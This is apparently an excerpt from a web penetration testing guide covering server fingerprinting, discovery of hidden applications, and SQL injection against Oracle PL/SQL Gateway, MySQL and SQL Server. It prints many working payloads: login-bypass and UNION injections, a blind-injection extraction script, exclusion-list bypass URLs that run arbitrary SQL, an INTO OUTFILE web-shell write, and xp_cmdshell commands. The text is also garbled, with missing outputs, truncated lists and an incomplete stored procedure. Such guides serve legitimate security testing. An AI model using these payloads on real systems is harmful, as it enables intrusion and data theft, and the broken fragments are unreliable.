Server: Apache/1.3.23
Connection: close
Transfer: chunked
$ nc iis.example.com 80
GET / HTTP/3.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com/Default.htm
Content-Type: text/HTML
Accept-Ranges: bytes
Content-Length: 133
Response from Netscape Enterprise 4.1:
$ nc netscape.example.com 80
GET / HTTP/3.0
Server: Netscape-Enterprise/4.1
Content-length: 140
Content-type: text/HTML
Connection: close
$ nc sunone.example.com 80
GET / HTTP/3.0
Server: Sun-ONE-Web-Server/6.1
Connection: close
$ nc apache.example.com 80
GET / JUNK/1.0
HTTP/1.1 200 OK
Server: Apache/1.3.23
ETag: 32417-c4-3e5d8a83
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML
$ nc iis.example.com 80
GET / JUNK/1.0
Server: Microsoft-IIS/5.0
Content-Type: text/HTML
Content-Length: 87
Response from Netscape Enterprise 4.1:
$ nc netscape.example.com 80
GET / JUNK/1.0

<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
<BODY><H1>Bad request</H1>
$ nc sunone.example.com 80
GET / JUNK/1.0

<HTML><HEAD><TITLE>Bad request</TITLE></HEAD>
<BODY><H1>Bad request</H1>
Automated Testing
The tests to carry out in order to accurately fingerprint a web server can be
many. Luckily, there are tools that automate these tests. "httprint" is one of
such tools. httprint has a signature dictionary that allows one to recognize the
type and the version of the web server in use.
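If you want to observe the header ordering yourself without httprint, a few
lines of Python will do (the host name below is a placeholder):

import socket

def grab_headers(host, port=80):
    # Send a bare HEAD request and print the response exactly as the
    # server emits it, preserving the header order
    s = socket.create_connection((host, port), timeout=5)
    s.sendall(("HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host).encode("ascii"))
    data = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        data += chunk
    s.close()
    print(data.decode("latin-1"))

grab_headers("apache.example.com")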
Application Discovery
Other issues affecting the scope of the assessment are represented by web
applications published at non-obvious URLs (e.g.,
http://www.example.com/some-strange-URL), which are not referenced
elsewhere. This may happen either by error (due to misconfiguration), or
intentionally (for example, unadvertised administrative interfaces).
There are three factors influencing how many applications are related to a
given DNS name (or an IP address):
1. Different base URL
2. Non-standard ports
While web applications usually live on port 80 (http) and 443 (https), there is
nothing magic about these port numbers. In fact, web applications may be
associated with arbitrary TCP ports, and can be referenced by specifying the
port number as follows: http[s]://www.example.com:port/. For example,
http://www.example.com:20000/.
3. Virtual hosts
It is sufficient to examine the output of a full-range port scan (e.g.,
nmap -sT -sV -p1-65535 192.168.1.100) and look for http or the indication of
SSL-wrapped services (which should be probed to confirm that they are
https). For example, the output of such a scan could look like:

(The 65527 ports scanned but not shown below are in state: closed)
$ telnet 192.168.1.100 8000
Trying 192.168.1.100...
Connected to 192.168.1.100.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.0 200 OK
pragma: no-cache
Content-Type: text/html
Server: MX4J-HTTPD/1.0
expires: now
Cache-Control: no-cache
<html>
...
The same task may be performed by vulnerability scanners, but first check
that your scanner of choice is able to identify http[s] services running on
non-standard ports. For example, Nessus [3] is capable of identifying them on
arbitrary ports (provided you instruct it to scan all the ports), and,
compared to nmap, will provide a number of tests on known web server
vulnerabilities, as well as on the SSL configuration of https services. As
hinted before, Nessus is also able to spot popular applications / web
interfaces which could otherwise go unnoticed (for example, a Tomcat
administrative interface).
There are a number of techniques which may be used to identify DNS names
associated to a given IP address x.y.z.t.
$ host -t ns www.owasp.org
www.owasp.org is an alias for owasp.org.
owasp.org name server ns1.secure.net.
owasp.org name server ns2.secure.net.
A zone transfer may now be requested to the name servers for domain
example.com. If you are lucky, you will get back a list of the DNS entries for
this domain. This will include the obvious www.example.com and the not-so-
obvious helpdesk.example.com and webmail.example.com (and possibly
others). Check all names returned by the zone transfer and consider all of
those which are related to the target being evaluated.
Trying to request a zone transfer for owasp.org from one of its name servers:
$ host -l www.owasp.org ns1.secure.net
Using domain server:
Name: ns1.secure.net
Address: 192.220.124.10#53
Aliases:

Host www.owasp.org not found: 5(REFUSED)
; Transfer failed.
This process is similar to the previous one, but relies on inverse (PTR) DNS
records. Rather than requesting a zone transfer, try setting the record type to
PTR and issue a query on the given IP address. If you are lucky, you may get
back a DNS name entry. This technique relies on the existence of IP-to-
symbolic name maps, which is not guaranteed.
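In a pinch, a single call in Python performs the inverse query (the address
below is a placeholder from the documentation range):

import socket

# PTR (reverse) lookup; raises socket.herror if no name exists for the IP
print(socket.gethostbyaddr("192.0.2.10"))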
This kind of search is akin to DNS zone transfer, but relies on web-based
services that enable name-based searches on DNS. One such service is the
Netcraft Search DNS service, available at http://searchdns.netcraft.com/?
host. You may query for a list of names belonging to your domain of choice,
such as example.com. Then you will check whether the names you obtained
are pertinent to the target you are examining.
Reverse-IP services
Reverse-IP services are similar to DNS inverse queries, with the difference
that you query a web-based application instead of a name server. There are a
number of such services available. Since they tend to return partial (and
often different) results, it is better to use multiple services to obtain a
more comprehensive analysis.
A common error that we can see during our search is the HTTP 404 Not
Found. Often this error code provides useful details about the underlying
web server and associated components, because many default 404 pages include
the server's signature.
Web server errors aren't the only useful output requiring security analysis.
Consider an error message containing the code 80004005: this is a generic
IIS error code which indicates
that it could not establish a connection to its associated database. In many
cases, the error message will detail the type of the database. This will often
indicate the underlying operating system by association. With this
information, the penetration tester can plan an appropriate strategy for the
security test.
By manipulating the variables that are passed to the database connect string,
we can invoke more detailed errors.
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host
If we see in the HTML code of the logon page the presence of a hidden
field with a database IP, we can try to change this value in the URL with
the address of database server under the penetration tester's control in an
attempt to fool the application into thinking that the logon was successful.
There are various ways in which errors can be handled in the .NET
Framework. Errors are handled at three places in ASP.NET: the web.config
customErrors section, the global.asax Application_Error sub, and the
page-level Page_Error sub. In web.config, custom errors are configured as
follows:
<customErrors defaultRedirect="myerrorpagedefault.aspx" mode="On|Off|RemoteOnly">
  <error statusCode="404" redirect="myerrorpagefor404.aspx"/>
  <error statusCode="500" redirect="myerrorpagefor500.aspx"/>
</customErrors>
To test for IIS custom errors, type a random page name with an .asp
extension in your browser:

http://www.mywebserver.com/anyrandomname.asp

If the standard IIS error page comes back, it means that IIS custom errors
are not configured. Please note the .asp extension.
Also test for .NET custom errors. Type a random page name with an .aspx
extension in your browser:

http://www.mywebserver.com/anyrandomname.aspx
--------------------------------------------------------------------------------
Description: HTTP 404. The resource you are looking for (or one of its
dependencies) could have been removed, had its name changed, or is
temporarily unavailable. Please review the following URL and make
sure that it is spelled correctly.

If you see the above, custom errors for .NET are not configured.
This moves us into the realms of reverse engineering network software and
databases.
Database Testing
SQL Injection
SQL Injection attacks can be divided into the following three classes:
Inband: data is extracted using the same channel that is used to inject
the SQL code.
Out-of-band: data is retrieved using a different channel (e.g., an email
with the results of the query is generated and sent to the tester).
Inferential: there is no actual transfer of data, but the tester is able to
reconstruct the information by sending particular requests and observing
the resulting behavior of the DB server.
Independent of the attack class, a successful SQL Injection attack requires the
attacker to craft a syntactically correct SQL Query. If the application returns an
error message generated by an incorrect query, then it is easy to reconstruct the
logic of the original query and, therefore, understand how to perform the
injection correctly. However, if the application hides the error details, then the
tester must be able to reverse engineer the logic of the original query. The
latter case is known as "Blind SQL Injection".
The tester has to make a list of all input fields whose values could be used in
crafting a SQL query, including the hidden fields of POST requests and then
test them separately, trying to interfere with the query and to generate an error.
The very first test usually consists of adding a single quote (') or a semicolon
(;) to the field under test. The first is used in SQL as a string terminator and, if
not filtered by the application, would lead to an incorrect query. The second
is used to end a SQL statement and, if it is not filtered, it is also likely to
generate an error. The output of a vulnerable field might resemble the
following (on a Microsoft SQL Server, in this case):
Also comments (--) and other SQL keywords like 'AND' and 'OR' can be
used to try to modify the query. A very simple but sometimes still effective
technique is simply to insert a string where a number is expected, as an
error like the following might be generated:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
If we suppose that the values of the parameters are sent to the server
through the GET method, and if the domain of the vulnerable web site is
www.example.com, the request that we'll carry out will be:
http://www.example.com/index.php?
username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%2
0'1
After a short analysis we notice that the query returns a value (or a set of
values) because the condition is always true (OR 1=1). In this way the
system has authenticated the user without knowing the username and
password.
In some systems the first row of a user table would be an administrator user.
This may be the profile returned in some cases.
In this case, there are two problems, one due to the use of the parentheses and
one due to the use of MD5 hash function. First of all, we resolve the problem
of the parentheses. That simply consists of adding a number of closing
parentheses until we obtain a corrected query. To resolve the second problem,
we try to invalidate the second condition. We add to our query a final symbol
that means that a comment is beginning. In this way, everything that follows
such a symbol is considered a comment. Every DBMS has its own comment
symbols; however, a symbol common to the greater part of databases is /*.
In Oracle the symbol is "--". This said, the values that we'll use as
Username and Password are:
$username = 1' or '1' = '1'))/*
$password = foo
http://www.example.com/index.php?
username=1'%20or%20'1'%20=%20'1'))/*&password=foo
$username = 1' or '1' = '1')) LIMIT 1/*
$password = foo
http://www.example.com/index.php?
username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo
Another test involves the use of the UNION operator. This operator is used in
SQL injections to join a query, purposely forged by the tester, to the original
query. The result of the forged query will be joined to the result of the original
query, allowing the tester to obtain the values of fields of other tables. We
suppose for our examples that the query executed from the server is the
following:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL
SELECT creditCardNumber,1,1 FROM CreditCardTable

which will join the result of the original query with all the credit card
numbers in the CreditCardTable. The keyword ALL is necessary to get around
queries that use the keyword DISTINCT. Moreover, we notice that beyond the
credit card numbers, we have selected two other values. These two values are
necessary, because the two queries must have an equal number of columns, in
order to avoid a syntax error.
We have pointed out that there is another category of SQL injection, called
Blind SQL Injection, in which nothing is known about the outcome of an
operation. For example, this behavior happens in cases where the
programmer has created a custom error page that does not reveal anything
about the structure of the query or the database. (The page does not return
a SQL error; it may just return an HTTP 500.)
By using inference methods, it is possible to overcome this obstacle and
succeed in recovering the values of some desired fields. This method
consists of carrying out a series of boolean queries against the server,
observing the answers and finally deducing the meaning of such answers. We
consider, as always, the www.example.com domain and we suppose that it
contains a parameter named id vulnerable to SQL injection. This means that
carrying out the following request:

http://www.example.com/index.php?id=1'

we will get one page with a custom error message which is due to a syntactic
error in the query. We suppose that the query executed on the server is:

SELECT field1, field2, field3 FROM Users WHERE Id='$Id'

The tests will use the following functions:
ASCII(char): gives back the ASCII value of the input character. A null value
is returned if char is 0.
LENGTH(text): gives back the length in characters of the input text.
SUBSTRING(text, start, length): gives back a substring of the input text,
starting at the given position and with the given length.
Through such functions, we will execute our tests on the first character
and, when we have discovered the value, we will move on to the second and so
on, until we have discovered the entire value. The tests will take advantage
of the function SUBSTRING, in order to select only one character at a time
(setting the length parameter to 1), and the function ASCII, in order to
obtain the ASCII value, so that we can do a numerical comparison. The
comparison is repeated against the values of the ASCII table, until the
right value is found. As an example, we will use the following value for Id:

$Id = 1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1
The previous example returns a result if and only if the first character of the
field username is equal to the ASCII value 97. If we get a false value, then we
increase the index of the ASCII table from 97 to 98 and we repeat the request.
If instead we obtain a true value, we set to zero the index of the ASCII table
and we analyze the next character, modifying the parameters of the
SUBSTRING function. The problem is to understand in which way we can
distinguish tests returning a true value from those that return false. To do this,
we create a query that always returns false. This is possible by using the
following value for Id:

$Id = 1' AND '1' = '2

which produces the query:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'
The obtained response from the server (that is HTML code) will be the
false value for our tests. This is enough to verify whether the value
obtained from the execution of the inferential query is equal to the value
obtained with the test executed before. Sometimes, this method does not
work. If the server returns two different pages as a result of two identical
consecutive web requests, we will not be able to discriminate the true
value from the false value. In these particular cases, it is necessary to use
particular filters that allow us to eliminate the code that changes between
the two requests and to obtain a template. Later on, for every inferential
request executed, we will extract the relative template from the response
using the same function, and we will perform a comparison between the two
templates in order to decide the result of the test.
The query returns either true or false. If we obtain true, then we have
completed inference and, therefore, we know the value of the parameter. If
we obtain false, this means that the null character is present in the value of
the parameter, and we must continue to analyze the next parameter until we
find another null value.
The blind SQL injection attack needs a high volume of queries. The tester may
need an automatic tool to exploit the vulnerability.
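A minimal sketch of such automation in Python, assuming the hypothetical
vulnerable id parameter discussed above and a static page (dynamic pages
would need the template filtering described earlier); requests is a
third-party HTTP library:

import requests
import string

URL = "http://www.example.com/index.php"   # hypothetical vulnerable page

# Baseline: a condition that is always false
false_page = requests.get(URL, params={"id": "1' AND '1'='2"}).text

recovered = ""
for pos in range(1, 9):   # first 8 characters of the username field
    for ch in string.ascii_letters + string.digits + "_":
        cond = ("1' AND ASCII(SUBSTRING(username,%d,1))=%d AND '1'='1"
                % (pos, ord(ch)))
        # A response different from the known false page means "true"
        if requests.get(URL, params={"id": cond}).text != false_page:
            recovered += ch
            break
print(recovered)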
Oracle Testing
Web based PL/SQL applications are enabled by the PL/SQL Gateway - it is the
component that translates web requests into database queries. Oracle has
developed a number of software implementations ranging from the early web
listener product to the Apache mod_plsql module to the XML Database (XDB)
web server. All have their own quirks and issues, each of which will be
thoroughly investigated in this section. Products that use the PL/SQL Gateway
include, but are not limited to, the Oracle HTTP Server, eBusiness Suite,
Portal, HTMLDB, WebDB and Oracle Application Server.
1) The web server accepts a request from a web client and determines it
should be processed by the PL/SQL Gateway
2) The PL/SQL Gateway processes the request by extracting the requested
package name, procedure, and variables
3) The requested package and procedure are wrapped in a block of anonymous
PL/SQL and sent to the database server
4) The database server executes the procedure and sends the results
back to the Gateway as HTML
5) The Gateway, via the web server, sends the response back to the client
Understanding this is important - the PL/SQL code does not exist on the web
server but, rather, in the database server. This means that any weaknesses in
the PL/SQL Gateway, or any weaknesses in the PL/SQL application, when
exploited, give an attacker direct access to the database server; no amount of
firewalls will prevent this.
URLs for PL/SQL web applications are normally easily recognizable and
generally start with the following (xyz can be any string and represents a
Database Access Descriptor, which you will learn more about later):
http://www.example.com/pls/xyz
http://www.example.com/xyz/owa
http://www.example.com/xyz/plsql
While the second and third of these examples represent URLs from older
versions of the PL/SQL Gateway, the first is from more recent versions
running on Apache. In the plsql.conf Apache configuration file, /pls is the
default, specified as a Location with the PLS module as the handler. The
location need not be /pls, however. The absence of a file extension in a URL
could indicate the presence of the Oracle PL/SQL Gateway. Consider the
following URL:
http://www.server.com/aaa/bbb/xxxxx.yyyyy

If xxxxx.yyyyy were replaced with something along the lines of ebank.home or
store.welcome, then there is a fairly strong chance that the PL/SQL Gateway
is being used. It is also possible to precede the requested package and
procedure with the name of the user (schema) that owns it, for example:

http://www.server.com/pls/xyz/webuser.pkg.proc
Many servers use one of a number of well-known default DADs, such as:

SIMPLEDAD
HTMLDB
ORASSO
SSODAD
PORTAL
PORTAL2
PORTAL30
PORTAL30_SSO
TEST
DAD
APP
ONLINE
DB
OWA
The web server's response headers are a good indicator as to whether the
server is running the PL/SQL Gateway. The table below lists some of the
typical server response headers:
Oracle-Application-Server-10g
Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
Oracle-Application-Server-10g/9.0.4.1.0 Oracle-HTTP-Server
Oracle-Application-Server-10g OracleAS-Web-Cache-10g/9.0.4.2.0 (N)
Oracle-Application-Server-10g/9.0.4.0.0
In PL/SQL, a block that does nothing is perfectly valid, as this SQL*Plus
session shows:

SQL> BEGIN
2 NULL;
3 END;
4 /
We can use this to test if the server is running the PL/SQL Gateway. Simply
take the DAD and append NULL then append NOSUCHPROC:
http://www.example.com/pls/dad/null
http://www.example.com/pls/dad/nosuchproc
If the server responds with a 200 OK response for the first and a 404 Not
Found for the second then it indicates that the server is running the PL/SQL
Gateway.
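The same check is easy to script; a sketch using the third-party requests
library (the base URL is a placeholder, and dad stands for the DAD under
test):

import requests

BASE = "http://www.example.com/pls/dad/"

r_null = requests.get(BASE + "null")
r_junk = requests.get(BASE + "nosuchproc")
# 200 for the valid NULL block plus 404 for a nonexistent procedure
# is the telltale combination
if r_null.status_code == 200 and r_junk.status_code == 404:
    print("PL/SQL Gateway is likely running")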
Requesting

http://www.example.com/pls/dad/owa_util.signature

should return text like "This page was produced by the PL/SQL Web Toolkit"
in the response. If you don't get this response but a 403 Forbidden response,
then you can infer that the PL/SQL Gateway is running; this is the response
you should get in later versions or patched systems.
On unpatched systems, packages like OWA_UTIL can even be called directly to
run arbitrary SQL queries:

http://www.example.com/pls/dad/OWA_UTIL.CELLSPRINT?
P_THEQUERY=SELECT+USERNAME+FROM+ALL_USERS
Cross Site Scripting attacks could be launched via the HTP package:
http://www.example.com/pls/dad/HTP.PRINT?CBUF=<script>alert('XSS')
</script>
http://www.example.com/pls/dad/CXTSYS.DRILOAD.VALIDATE_STMT?
SQLSTMT=SELECT+1+FROM+DUAL
This will return a blank HTML page with a 200 OK response if the
database server is still vulnerable to this flaw (CVE-2006-0265)
Over the years the Oracle PL/SQL Gateway has suffered from a number of
flaws including access to admin pages (CVE-2002-0561), buffer overflows
(CVE-2002-0559), directory traversal bugs and vulnerabilities that can allow
attackers bypass the Exclusion List and go on to access and execute arbitrary
PL/SQL packages in the database server.
It is incredible how many times Oracle has attempted to fix flaws that allow
attackers to bypass the exclusion list. Each patch that Oracle has produced has
fallen victim to a new bypass technique.
When Oracle first introduced the PL/SQL Exclusion List to prevent attackers
from accessing arbitrary PL/SQL packages, it could be trivially bypassed by
preceding the name of the schema/package with a hex encoded newline
character or space or tab:
http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC
http://www.example.com/pls/dad/%20SYS.PACKAGE.PROC
http://www.example.com/pls/dad/%09SYS.PACKAGE.PROC
Later versions of the Gateway allowed attackers to bypass the exclusion list
by preceding the name of the schema/package with a label. In PL/SQL a label
points to a line of code that can be jumped to using the GOTO statement and
takes the following form: <<NAME>>
http://www.example.com/pls/dad/<<LBL>>SYS.PACKAGE.PROC
Simply placing the name of the schema/package in double quotes could allow
an attacker to bypass the exclusion list. Note that this will not work on Oracle
Application Server 10g as it converts the user's request to lowercase before
sending it to the database server and a quote literal is case sensitive - thus
"SYS" and "sys" are not the same, and requests for the latter will result in a
404 Not Found. On earlier versions though the following can bypass the
exclusion list:
http://www.example.com/pls/dad/"SYS".PACKAGE.PROC
Depending upon the character set in use on the web server and on the database
server, some characters are translated. Thus, depending upon the character
sets in use, the "ÿ" character (0xFF) might be converted to a "Y" at the
database server. Another character that is often converted to an upper case
"Y" is the macron character, 0xAF. This may allow an attacker to bypass the
exclusion list:

http://www.example.com/pls/dad/S%FFS.PACKAGE.PROC
http://www.example.com/pls/dad/S%AFS.PACKAGE.PROC
Some versions of the PL/SQL Gateway allow the exclusion list to be bypassed
with a backslash - 0x5C:
http://www.example.com/pls/dad/%5CSYS.PACKAGE.PROC
This is the most complex method of bypassing the exclusion list and is
the most recently patched method. If we were to request the following
http://www.example.com/pls/dad/foo.bar?xyz=123
the application server would execute the following at the database server:
1 declare
2 rc__ number;
3 start_time__ binary_integer;
4 simple_list__ owa_util.vc_arr;
5 complex_list__ owa_util.vc_arr;
6 begin
7 start_time__ := dbms_utility.get_time;
8 owa.init_cgi_env(:n__,:nm__,:v__);
9 htp.HTBUF_LEN := 255;
10 null;
11 null;
12 simple_list__(1) := 'sys.%';
13 simple_list__(2) := 'dbms\_%';
14 simple_list__(3) := 'utl\_%';
15 simple_list__(4) := 'owa\_%';
16 simple_list__(5) := 'owa.%';
17 simple_list__(6) := 'htp.%';
18 simple_list__(7) := 'htf.%';
19 if ((owa_match.match_pattern('foo.bar', simple_list__,
complex_list__, true))) then
20 rc__ := 2;
21 else
22 null;
23 orasso.wpg_session.init();
24 foo.bar(XYZ=>:XYZ);
25 if (wpg_docload.is_file_download) then
26 rc__ := 1;
27 wpg_docload.get_download_file(:doc_info);
28 orasso.wpg_session.deinit();
29 null;
30 null;
31 commit;
32 else
33 rc__ := 0;
34 orasso.wpg_session.deinit();
35 null;
36 null;
37 commit;
38 owa.get_page(:data__,:ndata__);
39 end if;
40 end if;
41 :rc__ := rc__;
42 :db_proc_time__ := dbms_utility.get_time - start_time__;
43 end;
Notice lines 19 and 24. On line 19 the user's request is checked against a
list of known bad strings: the exclusion list. If the user's requested
package and procedure do not contain bad strings, then the procedure is
executed on line 24. The XYZ parameter is passed as a bind variable.
http://server.example.com/pls/dad/INJECT'POINT
..
18 simple_list__(7) := 'htf.%';
19 if ((owa_match.match_pattern('inject'point', simple_list__,
complex_list__, true))) then
20 rc__ := 2;
21 else
22 null;
23 orasso.wpg_session.init();
24 inject'point;
..
This generates an error in the error log: "PLS-00103: Encountered the symbol
'POINT' when expecting one of the following...". To exploit this, the
attacker needs a procedure that takes no parameters and does not match
anything in the exclusion list, for example:
PORTAL.WWV_HTP.CENTERCLOSE
ORASSO.HOME
WWC_VERSION.GET_HTTP_DATABASE_INFO
Picking one of these that actually exists (i.e. returns a 200 OK when
requested), if an attacker requests:
http://server.example.com/pls/dad/orasso.home?FOO=BAR
the server should return a 404 File Not Found response because the
orasso.home procedure does not require parameters and one has been
supplied. However, before the 404 is returned, the following PL/SQL is
executed:
..
..
if ((owa_match.match_pattern('orasso.home', simple_list__,
complex_list__, true))) then rc__ := 2;
else
null;
orasso.wpg_session.init();
orasso.home(FOO=>:FOO);
..
..
Note the presence of FOO in the attacker's query string. They can abuse this
to run arbitrary SQL. First, they need to close the brackets:
http://server.example.com/pls/dad/orasso.home?);--=BAR
..
orasso.home();--=>:);--);
..
Note that everything after the double minus (--) is treated as a comment. This
request will cause an internal server error because one of the bind variables is
no longer used, so the attacker needs to add it back. As it happens, it's this
bind variable that is the key to running arbitrary PL/SQL. For the moment,
they can just use HTP.PRINT to print BAR, and add the needed bind variable
as :1:
http://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR
This should return a 200 with the word BAR in the HTML. What's
happening here is that everything after the equals sign - BAR in this case -
is the data inserted into the bind variable. Using the same technique it's
possible to also gain access to owa_util.cellsprint again:
http://www.example.com/pls/dad/orasso.home?);OWA_UTIL.CELLSPRINT(:1);-
-
=SELECT+USERNAME+FROM+ALL_USERS
To execute arbitrary SQL, including DML and DDL statements, the attacker
inserts an execute immediate :1:
http://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;-
- =select%201%20from%20dual
Note that the output won't be displayed. This can be leveraged to exploit
any PL/SQL injection bugs owned by SYS, thus enabling an attacker to
gain complete control of the backend database server. For example, the
following URL takes advantage of the SQL injection flaws in
DBMS_EXPORT_EXTENSION (see
http://secunia.com/advisories/19860)
http://www.example.com/pls/dad/orasso.home?);
execute%20immediate%20:1;--
=DECLARE%20BUF%20VARCHAR2(2000);%20BEGIN%20
BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
('INDEX_NAME','INDEX_SCHEMA','DBMS_OUTPUT.PUT_LINE(:p1);
EXECUTE%20IMMEDIATE%20''CREATE%20OR%20REPLACE%20
PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.OWA_UTIL'';
END;--','SYS',1,'VER',0);END;
During black box security assessments, the code of the custom PL/SQL
application is not available, but it still needs to be assessed for security
vulnerabilities. Testing for SQL injection is done as usual, e.g., by
embedding a single quote into the parameter and checking for error
responses (which include 404 Not Found errors). Confirming the
presence of SQL injection can be performed using the concatenation
operator.
For example, assume there is a bookstore PL/SQL web application that allows
users to search for books by a given author:
http://www.example.com/pls/bookstore/books.search?author=DICKENS
http://www.example.com/pls/bookstore/books.search?author=DICK'ENS
http://www.example.com/pls/bookstore/books.search?author=DICK'||'ENS
The second request should produce an error. If the third request, using the
concatenation operator, again returns books by Charles Dickens, you've
confirmed SQL injection.
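A sketch of the same check in Python (the bookstore URL is the hypothetical
one from above; requests URL-encodes the quotes for us):

import requests

BASE = "http://www.example.com/pls/bookstore/books.search"

normal = requests.get(BASE, params={"author": "DICKENS"}).text
concat = requests.get(BASE, params={"author": "DICK'||'ENS"}).text
# If the concatenated value produces the same result page, the input
# reached the SQL query unsanitized
print("SQL injection confirmed" if normal == concat else "not confirmed")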
MySQL Testing
SQL Injection vulnerabilities occur whenever input is used in the
construction of a SQL query without being adequately constrained or
sanitized. The use of dynamic SQL (the construction of SQL queries by
concatenation of strings) opens the door to these vulnerabilities. SQL
injection allows an attacker to access the SQL server. It allows for the
execution of SQL code under the privileges of the user used to connect to
the database.
How to Test
When a SQL Injection is found with MySQL as DBMS backend, there are
a number of attacks that could be accomplished depending on MySQL
version and user privileges on DBMS.
MySQL comes in at least four versions used in production worldwide:
3.23.x, 4.0.x, 4.1.x and 5.0.x. Every version has a set of features
proportional to its version number.
From now on, it will be supposed there is a classic SQL injection in a request
like the one described in the Section on Testing for SQL Injection.
http://www.example.com/page.php?id=2

Note that MySQL interprets escaped apostrophes (\') as characters and not as
metacharacters.
So, if the application, to work properly, needs to use constant strings, two
cases are to be differentiated:
1. The web app escapes single quotes (' => \')
2. The web app does not escape single quotes (' => ')
Under MySQL, there is a standard way to bypass the need for single quotes,
by declaring a constant string without them. Let's suppose we want to know
the value of a field named 'password' in a record with a condition like the
following: password LIKE 'A%'. Since MySQL accepts hexadecimal literals in
place of quoted strings, the same condition can be written without quotes as
password LIKE 0x4125 (0x41 is 'A' and 0x25 is '%').
Information gathering
Fingerprinting MySQL
The MySQL version can be fingerprinted with version-specific comments, e.g.
by injecting /*!40110 and 1=0*/, which means: if the MySQL version is greater
than or equal to 4.01.10, the text 'and 1=0' is included in (and executed as
part of) the query.
Login User
There is a subtlety to keep in mind about the login user: an anonymous user
could connect (if allowed) with any name, but the MySQL internal user is an
empty name ('').
Attack vectors
Write in a File
If the connected user has FILE privileges _and_ single quotes are not
escaped, the 'INTO OUTFILE' clause can be used to export query results to a
file.
N.B. there is no way to bypass the single quotes surrounding the filename,
so if there is some sanitization on single quotes, like escaping (\'), there
will be no way to use the 'INTO OUTFILE' clause.
Example:

1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//'
LINES TERMINATED BY '\n<%jsp code here%>';

Result Expected:
Results are stored in a file with rw-rw-rw privileges owned by the MySQL
user and group, where /var/www/root/test.jsp will contain:

//field values//
<%jsp code here%>
load_file is a native function that can read a file when allowed by
filesystem permissions. If the connected user has FILE privileges, it can be
used to get a file's content:

load_file('filename')

Result Expected:
The whole file will be available for exporting by using standard techniques.
In a standard SQL injection, you can have results displayed directly in a
page as normal output or as a MySQL error. By using the already mentioned
SQL injection attacks and the already described MySQL features, direct SQL
injection can be accomplished at a depth depending primarily on the MySQL
version the pentester is facing.
Out of band injection could be accomplished by using the 'into outfile' clause.
String length:
LENGTH(str)
A time-consuming operation, useful for timing attacks:
BENCHMARK(#ofcycles, action_to_be_performed)
Moving from MySQL to Microsoft SQL Server, let's now see some examples of
attacks that use that DBMS's specific functions. Most of these examples will
use the exec function.
Below we show how to execute a shell command that writes the output of the
command dir c:\inetpub in a browseable file, assuming that the web server and
the DB server reside on the same host. The following syntax uses
xp_cmdshell:
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
/controlboard.asp?
boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
CONVERT will try to convert the result of db_name (a string) into an integer
variable, triggering an error, which, if displayed by the vulnerable
application, will contain the name of the DB.
/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-
06,1,'stat','name1','name2',2006-01-06,1,@@version%20--
And here's the same attack, but using again the conversion trick:
/controlboard.asp?
boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)
https://vulnerable.web.app/login.asp?
Username='%20or%20'1'='1&Password='%20or%20'1'='1
If the application is using Dynamic SQL queries, and the string gets
appended to the user credentials validation query, this may result in a
successful login to the application.
https://vulnerable.web.app/list_report.aspx?
number=001%20UNION%20ALL%20SELECT%201,1,'a',1,1,1%20FROM%20users;--
POST https://vulnerable.web.app/forgotpass.asp HTTP/1.1
Host: vulnerable.web.app
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://vulnerable.web.app/forgotpass.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

email=%27&whichSubmit=submit&submit.x=0&submit.y=0
The error message obtained when a ' (single quote) character is entered at the
email field is:
/forgotpass.asp, line 15
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
This code, written by Antonin Foller (see links at the bottom of the page),
creates a new xp_cmdshell using sp_OACreate, sp_OAMethod and sp_OADestroy
(as long as they haven't been disabled too, of course). Before using it, we
need to delete the first xp_cmdshell we created (even if it was not
working), otherwise the two declarations will collide.
On SQL Server 2005, xp_cmdshell can be re-enabled by injecting the following
code instead:

master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
This allows the execution of arbitrary SQL code. The same happens with the
User-Agent header set to:

User-Agent: user_agent', 'some_ip'); [SQL CODE]--
In SQL Server, one of the most useful (at least for the penetration tester)
commands is OPENROWSET, which is used to run a query on another DB
Server and retrieve the results. The penetration tester can use this command
to scan ports of other machines in the target network, injecting the following
query:
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;
Address=x.y.w.z,p;timeout=5','select 1')--
On the other hand, if the port is open, one of the following errors will be
returned:
